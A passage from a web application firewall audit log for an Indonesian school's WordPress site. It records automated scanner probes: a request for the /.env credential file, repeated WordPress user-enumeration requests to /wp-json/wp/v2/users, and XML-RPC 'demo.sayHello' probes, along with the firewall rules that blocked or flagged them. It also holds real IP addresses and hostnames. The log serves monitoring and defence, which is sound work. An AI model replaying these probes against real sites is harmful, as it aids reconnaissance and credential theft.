smkn22-jkt.sch.id X-Real-IP: 154.213.163.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.40 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b6931c18-C-- demo.sayHello --b6931c18-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b6931c18-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746807303644509 5965 (- - -) Stopwatch2: 1746807303644509 5965; combined=4315, p1=582, p2=3507, p3=33, p4=36, p5=94, sr=76, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b6931c18-Z-- --534bec54-A-- [09/May/2025:23:15:44 +0700] aB4qLy-fAO47ojYKsMr6DQAAAEY 103.236.140.4 57392 103.236.140.4 8181 --534bec54-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.232.183.83 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.232.183.83 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --534bec54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --534bec54-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746807343999740 714 (- - -) Stopwatch2: 1746807343999740 714; combined=264, p1=229, p2=0, p3=0, p4=0, p5=34, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --534bec54-Z-- --e2fa4743-A-- [09/May/2025:23:17:43 +0700] aB4qp1oC-7ITMWTA_c9fHwAAANA 103.236.140.4 57402 103.236.140.4 8181 --e2fa4743-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.194.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.194.173 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e2fa4743-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2fa4743-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746807463884830 2954 (- - -) Stopwatch2: 1746807463884830 2954; combined=1318, p1=472, p2=815, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2fa4743-Z-- --7373ba56-A-- [09/May/2025:23:17:49 +0700] aB4qrVoC-7ITMWTA_c9fIQAAANQ 103.236.140.4 57406 103.236.140.4 8181 --7373ba56-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.194.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.194.173 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7373ba56-C-- demo.sayHello --7373ba56-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7373ba56-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746807469799150 5441 (- - -) Stopwatch2: 1746807469799150 5441; combined=4086, p1=530, p2=3328, p3=30, p4=34, p5=101, sr=74, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7373ba56-Z-- --e6fbf052-A-- [09/May/2025:23:19:14 +0700] aB4rAlqQ1nOVx9fWpZSxgQAAAAk 103.236.140.4 57426 103.236.140.4 8181 --e6fbf052-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.179.159 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.179.159 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e6fbf052-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6fbf052-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746807554641898 3436 (- - -) Stopwatch2: 1746807554641898 3436; combined=1434, p1=480, p2=923, p3=0, p4=0, p5=31, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6fbf052-Z-- --17af256f-A-- [09/May/2025:23:19:18 +0700] aB4rBlqQ1nOVx9fWpZSxgwAAAAg 103.236.140.4 57430 103.236.140.4 8181 --17af256f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.179.159 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.179.159 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --17af256f-C-- demo.sayHello --17af256f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --17af256f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746807558844337 5484 (- - -) Stopwatch2: 1746807558844337 5484; combined=4067, p1=516, p2=3336, p3=28, p4=33, p5=91, sr=75, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17af256f-Z-- --289bfb16-A-- [09/May/2025:23:24:38 +0700] aB4sRloC-7ITMWTA_c9fNQAAAMg 103.236.140.4 57506 103.236.140.4 8181 --289bfb16-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.57 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.57 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --289bfb16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --289bfb16-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746807878422011 2874 (- - -) Stopwatch2: 1746807878422011 2874; combined=1289, p1=454, p2=805, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --289bfb16-Z-- --6d5b1e34-A-- [09/May/2025:23:24:42 +0700] aB4sSloC-7ITMWTA_c9fNgAAANM 103.236.140.4 57510 103.236.140.4 8181 --6d5b1e34-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.57 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.57 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6d5b1e34-C-- demo.sayHello --6d5b1e34-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6d5b1e34-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746807882681979 6473 (- - -) Stopwatch2: 1746807882681979 6473; combined=4698, p1=585, p2=3828, p3=33, p4=34, p5=123, sr=98, sw=95, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d5b1e34-Z-- --b7929e51-A-- [09/May/2025:23:37:09 +0700] aB4vNVoC-7ITMWTA_c9fUQAAAMY 103.236.140.4 57634 103.236.140.4 8181 --b7929e51-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.171.34 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.171.34 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b7929e51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7929e51-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746808629666909 2975 (- - -) Stopwatch2: 1746808629666909 2975; combined=1351, p1=463, p2=859, p3=0, p4=0, p5=29, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7929e51-Z-- --f8172d1e-A-- [09/May/2025:23:37:12 +0700] aB4vOFqQ1nOVx9fWpZSxhwAAAAY 103.236.140.4 57638 103.236.140.4 8181 --f8172d1e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.171.34 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.171.34 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f8172d1e-C-- demo.sayHello --f8172d1e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f8172d1e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746808632087821 5255 (- - -) Stopwatch2: 1746808632087821 5255; combined=3957, p1=526, p2=3212, p3=29, p4=33, p5=93, sr=71, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8172d1e-Z-- --e5031372-A-- [09/May/2025:23:38:10 +0700] aB4vcloC-7ITMWTA_c9fVQAAAMQ 103.236.140.4 57644 103.236.140.4 8181 --e5031372-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.201.10.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.10.240 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e5031372-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e5031372-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746808690235959 2942 (- - -) Stopwatch2: 1746808690235959 2942; combined=1323, p1=481, p2=812, p3=0, p4=0, p5=30, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e5031372-Z-- --e4f60f62-A-- [09/May/2025:23:38:14 +0700] aB4vdloC-7ITMWTA_c9fVwAAAM4 103.236.140.4 57648 103.236.140.4 8181 --e4f60f62-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.201.10.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.10.240 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e4f60f62-C-- demo.sayHello --e4f60f62-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e4f60f62-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746808694179822 4727 (- - -) Stopwatch2: 1746808694179822 4727; combined=3682, p1=459, p2=3025, p3=22, p4=24, p5=89, sr=68, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4f60f62-Z-- --aa99c416-A-- [09/May/2025:23:38:44 +0700] aB4vlFoC-7ITMWTA_c9fWgAAANE 103.236.140.4 57656 103.236.140.4 8181 --aa99c416-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.201.10.79 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.10.79 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --aa99c416-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa99c416-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746808724871615 2952 (- - -) Stopwatch2: 1746808724871615 2952; combined=1349, p1=460, p2=859, p3=0, p4=0, p5=30, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa99c416-Z-- --48948b54-A-- [09/May/2025:23:38:49 +0700] aB4vmVoC-7ITMWTA_c9fXAAAAM0 103.236.140.4 57660 103.236.140.4 8181 --48948b54-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.201.10.79 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.10.79 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --48948b54-C-- demo.sayHello --48948b54-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --48948b54-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746808729284809 6481 (- - -) Stopwatch2: 1746808729284809 6481; combined=4611, p1=616, p2=3754, p3=39, p4=44, p5=95, sr=81, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48948b54-Z-- --9b753e4e-A-- [09/May/2025:23:39:36 +0700] aB4vyFoC-7ITMWTA_c9fXwAAAMo 103.236.140.4 57670 103.236.140.4 8181 --9b753e4e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.127 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.127 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9b753e4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9b753e4e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746808776847709 2834 (- - -) Stopwatch2: 1746808776847709 2834; combined=1247, p1=449, p2=768, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9b753e4e-Z-- --ab6f7147-A-- [09/May/2025:23:39:41 +0700] aB4vzVoC-7ITMWTA_c9fYAAAAMk 103.236.140.4 57674 103.236.140.4 8181 --ab6f7147-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.127 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.127 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ab6f7147-C-- demo.sayHello --ab6f7147-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab6f7147-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746808781536084 4944 (- - -) Stopwatch2: 1746808781536084 4944; combined=3988, p1=445, p2=3313, p3=28, p4=31, p5=98, sr=93, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab6f7147-Z-- --f3e3d642-A-- [09/May/2025:23:42:14 +0700] aB4wZlqQ1nOVx9fWpZSxiQAAAAo 103.236.140.4 57692 103.236.140.4 8181 --f3e3d642-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.243 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.243 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f3e3d642-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3e3d642-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746808934470963 3024 (- - -) Stopwatch2: 1746808934470963 3024; combined=1357, p1=472, p2=855, p3=0, p4=0, p5=29, sr=105, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3e3d642-Z-- --19e1cd44-A-- [09/May/2025:23:42:20 +0700] aB4wa1qQ1nOVx9fWpZSxiwAAABE 103.236.140.4 57696 103.236.140.4 8181 --19e1cd44-B-- POST /xmlrpc.php HTTP/1.0 Host: 